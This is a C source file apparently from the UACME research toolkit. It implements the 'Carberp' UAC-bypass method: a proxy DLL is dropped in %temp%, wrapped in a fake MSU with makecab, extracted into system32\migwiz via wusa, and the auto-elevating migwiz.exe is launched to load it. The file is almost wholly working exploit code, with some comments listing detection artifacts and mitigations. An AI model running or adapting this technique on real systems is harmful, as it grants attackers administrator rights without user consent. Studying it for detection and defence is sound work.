UACME/Source/Akagi/carberp.c


/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2015
*
* TITLE: CARBERP.C
*
* VERSION: 1.20
*
* DATE: 29 Mar 2015
*
* Tweaked Carberp method with migwiz as the DLL hijacking target.
* The original Carberp method exploits mcx2prov.exe in ehome.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmWusaMethod
*
* Purpose:
*
* Build and install a fake MSU package, then run migwiz.
*
*/
BOOL ucmWusaMethod(
PVOID ProxyDll,      // in-memory image of the DLL that gets written to disk (caller owns the buffer)
DWORD ProxyDllSize   // size of ProxyDll in bytes, passed straight to supWriteBufferToFile
)
{
// Return value: TRUE only if every step below succeeded and the final
// supRunProcess() call on migwiz.exe reported success; FALSE otherwise.
// Each stage logs a "[UCM] ..." line through OutputDebugString, so those
// strings are a convenient marker when tracing the method in a debugger.
BOOL bResult = FALSE, cond = FALSE;
WCHAR szDllFileName[MAX_PATH + 1];
WCHAR szMsuFileName[MAX_PATH + 1];
WCHAR szCmd[MAX_PATH * 4];
// Zeroed up front so the cleanup block can rely on szXxx[0] == 0 meaning
// "this path was never produced" when an early break is taken.
RtlSecureZeroMemory(szDllFileName, sizeof(szDllFileName));
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
// do { ... } while (FALSE): single pass, `break` acts as a goto-cleanup.
do {
// Only a zero return (API failure) is treated as an error here; the two
// expansions are sized with MAX_PATH, one less than the buffers hold.
if (ExpandEnvironmentStringsW(L"%temp%\\wdscore.dll",
szDllFileName, MAX_PATH) == 0)
{
break;
}
if (ExpandEnvironmentStringsW(L"%temp%\\wdscore.msu",
szMsuFileName, MAX_PATH) == 0)
{
break;
}
//drop proxy dll
// Detection note: a file named wdscore.dll appearing in %temp% is the
// first on-disk artifact of this method.
if (!supWriteBufferToFile(szDllFileName, ProxyDll, ProxyDllSize)) {
OutputDebugString(TEXT("[UCM] Failed to drop proxy dll"));
break;
}
//create cab with msu extension
// szCmd is sized MAX_PATH * 4; both inserted paths are at most MAX_PATH
// characters, so the wsprintfW below stays within the buffer.
RtlSecureZeroMemory(szCmd, sizeof(szCmd));
wsprintfW(szCmd, L" /V1 %ws %ws", szDllFileName, szMsuFileName);
// Detection note: makecab.exe launched with a %temp%\*.msu output argument.
if (!supRunProcess(L"makecab.exe", szCmd)) {
OutputDebugString(TEXT("[UCM] Makecab failed"));
break;
}
//
// Target is migwiz because it has manifest with access = HighestAvailable and
// it is vulnerable to delay load dll attack.
//
// Detection note: wusa.exe run with "/extract:" pointing at a directory under
// %windir%\system32, followed by migwiz.exe loading wdscore.dll from that
// directory, is the observable chain of this method. Mitigation is the usual
// one for auto-elevation abuse: UAC set to "Always notify" and/or a non-admin
// daily-use account. NOTE(review): wusa's /extract switch was removed in later
// Windows releases, which should make this stage fail there -- confirm per OS.
RtlSecureZeroMemory(szCmd, sizeof(szCmd));
wsprintfW(szCmd, L"/c wusa %ws /extract:%%windir%%\\system32\\migwiz", szMsuFileName);
if (!supRunProcess(L"cmd.exe", szCmd)) {
OutputDebugString(TEXT("[UCM] Wusa failed"));
break;
}
// szCmd is reused to hold the expanded migwiz.exe path (no arguments).
RtlSecureZeroMemory(szCmd, sizeof(szCmd));
if (ExpandEnvironmentStringsW(L"%systemroot%\\system32\\migwiz\\migwiz.exe",
szCmd, MAX_PATH) == 0)
{
break;
}
// Launch result is the method's result; nothing is checked afterwards.
bResult = supRunProcess(szCmd, NULL);
} while (cond);
//cleanup
// Only the two %temp% artifacts are removed; whatever wusa extracted into
// system32\migwiz is left in place by this function.
if (szDllFileName[0] != 0) {
DeleteFileW(szDllFileName);
}
if (szMsuFileName[0] != 0) {
DeleteFileW(szMsuFileName);
}
return bResult;
}